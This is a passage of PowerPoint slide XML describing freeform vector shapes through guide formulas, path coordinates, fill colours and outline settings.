                    <a:lnTo>
                      <a:pt x="56" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36126" name="Freeform 259"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2531" y="2334"/>
                <a:ext cx="191" cy="155"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 191"/>
                  <a:gd name="T1" fmla="*/ 21 h 155"/>
                  <a:gd name="T2" fmla="*/ 180 w 191"/>
                  <a:gd name="T3" fmla="*/ 25 h 155"/>
                  <a:gd name="T4" fmla="*/ 181 w 191"/>
                  <a:gd name="T5" fmla="*/ 40 h 155"/>
                  <a:gd name="T6" fmla="*/ 182 w 191"/>
                  <a:gd name="T7" fmla="*/ 54 h 155"/>
                  <a:gd name="T8" fmla="*/ 190 w 191"/>
                  <a:gd name="T9" fmla="*/ 64 h 155"/>
                  <a:gd name="T10" fmla="*/ 188 w 191"/>
                  <a:gd name="T11" fmla="*/ 74 h 155"/>
                  <a:gd name="T12" fmla="*/ 171 w 191"/>
                  <a:gd name="T13" fmla="*/ 75 h 155"/>
                  <a:gd name="T14" fmla="*/ 161 w 191"/>
                  <a:gd name="T15" fmla="*/ 79 h 155"/>
                  <a:gd name="T16" fmla="*/ 150 w 191"/>
                  <a:gd name="T17" fmla="*/ 82 h 155"/>
                  <a:gd name="T18" fmla="*/ 147 w 191"/>
                  <a:gd name="T19" fmla="*/ 84 h 155"/>
                  <a:gd name="T20" fmla="*/ 150 w 191"/>
                  <a:gd name="T21" fmla="*/ 93 h 155"/>
                  <a:gd name="T22" fmla="*/ 138 w 191"/>
                  <a:gd name="T23" fmla="*/ 101 h 155"/>
                  <a:gd name="T24" fmla="*/ 127 w 191"/>
                  <a:gd name="T25" fmla="*/ 109 h 155"/>
                  <a:gd name="T26" fmla="*/ 119 w 191"/>
                  <a:gd name="T27" fmla="*/ 113 h 155"/>
                  <a:gd name="T28" fmla="*/ 107 w 191"/>
                  <a:gd name="T29" fmla="*/ 115 h 155"/>
                  <a:gd name="T30" fmla="*/ 103 w 191"/>
                  <a:gd name="T31" fmla="*/ 121 h 155"/>
                  <a:gd name="T32" fmla="*/ 87 w 191"/>
                  <a:gd name="T33" fmla="*/ 125 h 155"/>
                  <a:gd name="T34" fmla="*/ 72 w 191"/>
                  <a:gd name="T35" fmla="*/ 136 h 155"/>
                  <a:gd name="T36" fmla="*/ 71 w 191"/>
                  <a:gd name="T37" fmla="*/ 155 h 155"/>
                  <a:gd name="T38" fmla="*/ 49 w 191"/>
                  <a:gd name="T39" fmla="*/ 155 h 155"/>
                  <a:gd name="T40" fmla="*/ 11 w 191"/>
                  <a:gd name="T41" fmla="*/ 155 h 155"/>
                  <a:gd name="T42" fmla="*/ 1 w 191"/>
                  <a:gd name="T43" fmla="*/ 153 h 155"/>
                  <a:gd name="T44" fmla="*/ 7 w 191"/>
                  <a:gd name="T45" fmla="*/ 149 h 155"/>
                  <a:gd name="T46" fmla="*/ 24 w 191"/>
                  <a:gd name="T47" fmla="*/ 143 h 155"/>
                  <a:gd name="T48" fmla="*/ 36 w 191"/>
                  <a:gd name="T49" fmla="*/ 134 h 155"/>
                  <a:gd name="T50" fmla="*/ 52 w 191"/>
                  <a:gd name="T51" fmla="*/ 118 h 155"/>
                  <a:gd name="T52" fmla="*/ 56 w 191"/>
                  <a:gd name="T53" fmla="*/ 108 h 155"/>
                  <a:gd name="T54" fmla="*/ 52 w 191"/>
                  <a:gd name="T55" fmla="*/ 97 h 155"/>
                  <a:gd name="T56" fmla="*/ 52 w 191"/>
                  <a:gd name="T57" fmla="*/ 87 h 155"/>
                  <a:gd name="T58" fmla="*/ 60 w 191"/>
                  <a:gd name="T59" fmla="*/ 75 h 155"/>
                  <a:gd name="T60" fmla="*/ 61 w 191"/>
                  <a:gd name="T61" fmla="*/ 66 h 155"/>
                  <a:gd name="T62" fmla="*/ 71 w 191"/>
                  <a:gd name="T63" fmla="*/ 53 h 155"/>
                  <a:gd name="T64" fmla="*/ 83 w 191"/>
                  <a:gd name="T65" fmla="*/ 46 h 155"/>
                  <a:gd name="T66" fmla="*/ 97 w 191"/>
                  <a:gd name="T67" fmla="*/ 39 h 155"/>
                  <a:gd name="T68" fmla="*/ 105 w 191"/>
                  <a:gd name="T69" fmla="*/ 28 h 155"/>
                  <a:gd name="T70" fmla="*/ 114 w 191"/>
                  <a:gd name="T71" fmla="*/ 3 h 155"/>
                  <a:gd name="T72" fmla="*/ 120 w 191"/>
                  <a:gd name="T73" fmla="*/ 0 h 155"/>
                  <a:gd name="T74" fmla="*/ 126 w 191"/>
                  <a:gd name="T75" fmla="*/ 9 h 155"/>
                  <a:gd name="T76" fmla="*/ 135 w 191"/>
                  <a:gd name="T77" fmla="*/ 14 h 155"/>
                  <a:gd name="T78" fmla="*/ 144 w 191"/>
                  <a:gd name="T79" fmla="*/ 15 h 155"/>
                  <a:gd name="T80" fmla="*/ 157 w 191"/>
                  <a:gd name="T81" fmla="*/ 12 h 155"/>
                  <a:gd name="T82" fmla="*/ 163 w 191"/>
                  <a:gd name="T83" fmla="*/ 14 h 155"/>
                  <a:gd name="T84" fmla="*/ 171 w 191"/>
                  <a:gd name="T85" fmla="*/ 16 h 155"/>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91"/>
                  <a:gd name="T130" fmla="*/ 0 h 155"/>
                  <a:gd name="T131" fmla="*/ 191 w 191"/>
                  <a:gd name="T132" fmla="*/ 155 h 155"/>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91" h="155">
                    <a:moveTo>
                      <a:pt x="173" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36127" name="Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2914" y="1415"/>
                <a:ext cx="205" cy="473"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 205"/>
                  <a:gd name="T1" fmla="*/ 136 h 473"/>
                  <a:gd name="T2" fmla="*/ 177 w 205"/>
                  <a:gd name="T3" fmla="*/ 134 h 473"/>
                  <a:gd name="T4" fmla="*/ 163 w 205"/>
                  <a:gd name="T5" fmla="*/ 153 h 473"/>
                  <a:gd name="T6" fmla="*/ 157 w 205"/>
                  <a:gd name="T7" fmla="*/ 172 h 473"/>
                  <a:gd name="T8" fmla="*/ 159 w 205"/>
                  <a:gd name="T9" fmla="*/ 190 h 473"/>
                  <a:gd name="T10" fmla="*/ 137 w 205"/>
                  <a:gd name="T11" fmla="*/ 220 h 473"/>
                  <a:gd name="T12" fmla="*/ 123 w 205"/>
                  <a:gd name="T13" fmla="*/ 229 h 473"/>
                  <a:gd name="T14" fmla="*/ 110 w 205"/>
                  <a:gd name="T15" fmla="*/ 242 h 473"/>
                  <a:gd name="T16" fmla="*/ 99 w 205"/>
                  <a:gd name="T17" fmla="*/ 253 h 473"/>
                  <a:gd name="T18" fmla="*/ 97 w 205"/>
                  <a:gd name="T19" fmla="*/ 280 h 473"/>
                  <a:gd name="T20" fmla="*/ 100 w 205"/>
                  <a:gd name="T21" fmla="*/ 309 h 473"/>
                  <a:gd name="T22" fmla="*/ 109 w 205"/>
                  <a:gd name="T23" fmla="*/ 315 h 473"/>
                  <a:gd name="T24" fmla="*/ 125 w 205"/>
                  <a:gd name="T25" fmla="*/ 336 h 473"/>
                  <a:gd name="T26" fmla="*/ 121 w 205"/>
                  <a:gd name="T27" fmla="*/ 347 h 473"/>
                  <a:gd name="T28" fmla="*/ 106 w 205"/>
                  <a:gd name="T29" fmla="*/ 352 h 473"/>
                  <a:gd name="T30" fmla="*/ 90 w 205"/>
                  <a:gd name="T31" fmla="*/ 348 h 473"/>
                  <a:gd name="T32" fmla="*/ 95 w 205"/>
                  <a:gd name="T33" fmla="*/ 354 h 473"/>
                  <a:gd name="T34" fmla="*/ 104 w 205"/>
                  <a:gd name="T35" fmla="*/ 356 h 473"/>
                  <a:gd name="T36" fmla="*/ 116 w 205"/>
                  <a:gd name="T37" fmla="*/ 353 h 473"/>
                  <a:gd name="T38" fmla="*/ 120 w 205"/>
                  <a:gd name="T39" fmla="*/ 354 h 473"/>
                  <a:gd name="T40" fmla="*/ 111 w 205"/>
                  <a:gd name="T41" fmla="*/ 363 h 473"/>
                  <a:gd name="T42" fmla="*/ 107 w 205"/>
                  <a:gd name="T43" fmla="*/ 365 h 473"/>
                  <a:gd name="T44" fmla="*/ 100 w 205"/>
                  <a:gd name="T45" fmla="*/ 373 h 473"/>
                  <a:gd name="T46" fmla="*/ 86 w 205"/>
                  <a:gd name="T47" fmla="*/ 376 h 473"/>
                  <a:gd name="T48" fmla="*/ 90 w 205"/>
                  <a:gd name="T49" fmla="*/ 398 h 473"/>
                  <a:gd name="T50" fmla="*/ 89 w 205"/>
                  <a:gd name="T51" fmla="*/ 405 h 473"/>
                  <a:gd name="T52" fmla="*/ 85 w 205"/>
                  <a:gd name="T53" fmla="*/ 422 h 473"/>
                  <a:gd name="T54" fmla="*/ 74 w 205"/>
                  <a:gd name="T55" fmla="*/ 451 h 473"/>
                  <a:gd name="T56" fmla="*/ 57 w 205"/>
                  <a:gd name="T57" fmla="*/ 454 h 473"/>
                  <a:gd name="T58" fmla="*/ 52 w 205"/>
                  <a:gd name="T59" fmla="*/ 467 h 473"/>
                  <a:gd name="T60" fmla="*/ 36 w 205"/>
                  <a:gd name="T61" fmla="*/ 473 h 473"/>
                  <a:gd name="T62" fmla="*/ 29 w 205"/>
                  <a:gd name="T63" fmla="*/ 466 h 473"/>
                  <a:gd name="T64" fmla="*/ 22 w 205"/>
                  <a:gd name="T65" fmla="*/ 446 h 473"/>
                  <a:gd name="T66" fmla="*/ 29 w 205"/>
                  <a:gd name="T67" fmla="*/ 439 h 473"/>
                  <a:gd name="T68" fmla="*/ 20 w 205"/>
                  <a:gd name="T69" fmla="*/ 428 h 473"/>
                  <a:gd name="T70" fmla="*/ 12 w 205"/>
                  <a:gd name="T71" fmla="*/ 405 h 473"/>
                  <a:gd name="T72" fmla="*/ 9 w 205"/>
                  <a:gd name="T73" fmla="*/ 388 h 473"/>
                  <a:gd name="T74" fmla="*/ 2 w 205"/>
                  <a:gd name="T75" fmla="*/ 369 h 473"/>
                  <a:gd name="T76" fmla="*/ 6 w 205"/>
                  <a:gd name="T77" fmla="*/ 369 h 473"/>
                  <a:gd name="T78" fmla="*/ 13 w 205"/>
                  <a:gd name="T79" fmla="*/ 344 h 473"/>
                  <a:gd name="T80" fmla="*/ 22 w 205"/>
                  <a:gd name="T81" fmla="*/ 325 h 473"/>
                  <a:gd name="T82" fmla="*/ 25 w 205"/>
                  <a:gd name="T83" fmla="*/ 300 h 473"/>
                  <a:gd name="T84" fmla="*/ 17 w 205"/>
                  <a:gd name="T85" fmla="*/ 278 h 473"/>
                  <a:gd name="T86" fmla="*/ 18 w 205"/>
                  <a:gd name="T87" fmla="*/ 222 h 473"/>
                  <a:gd name="T88" fmla="*/ 33 w 205"/>
                  <a:gd name="T89" fmla="*/ 200 h 473"/>
                  <a:gd name="T90" fmla="*/ 50 w 205"/>
                  <a:gd name="T91" fmla="*/ 194 h 473"/>
                  <a:gd name="T92" fmla="*/ 46 w 205"/>
                  <a:gd name="T93" fmla="*/ 169 h 473"/>
                  <a:gd name="T94" fmla="*/ 56 w 205"/>
                  <a:gd name="T95" fmla="*/ 125 h 473"/>
                  <a:gd name="T96" fmla="*/ 78 w 205"/>
                  <a:gd name="T97" fmla="*/ 97 h 473"/>
                  <a:gd name="T98" fmla="*/ 82 w 205"/>
                  <a:gd name="T99" fmla="*/ 71 h 473"/>
                  <a:gd name="T100" fmla="*/ 104 w 205"/>
                  <a:gd name="T101" fmla="*/ 48 h 473"/>
                  <a:gd name="T102" fmla="*/ 112 w 205"/>
                  <a:gd name="T103" fmla="*/ 26 h 473"/>
                  <a:gd name="T104" fmla="*/ 137 w 205"/>
                  <a:gd name="T105" fmla="*/ 35 h 473"/>
                  <a:gd name="T106" fmla="*/ 145 w 205"/>
                  <a:gd name="T107" fmla="*/ 1 h 473"/>
                  <a:gd name="T108" fmla="*/ 156 w 205"/>
                  <a:gd name="T109" fmla="*/ 3 h 473"/>
                  <a:gd name="T110" fmla="*/ 189 w 205"/>
                  <a:gd name="T111" fmla="*/ 34 h 473"/>
                  <a:gd name="T112" fmla="*/ 197 w 205"/>
                  <a:gd name="T113" fmla="*/ 67 h 473"/>
                  <a:gd name="T114" fmla="*/ 200 w 205"/>
                  <a:gd name="T115" fmla="*/ 112 h 473"/>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205"/>
                  <a:gd name="T175" fmla="*/ 0 h 473"/>
                  <a:gd name="T176" fmla="*/ 205 w 205"/>
                  <a:gd name="T177" fmla="*/ 473 h 473"/>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205" h="473">
                    <a:moveTo>
                      <a:pt x="205" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="203" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
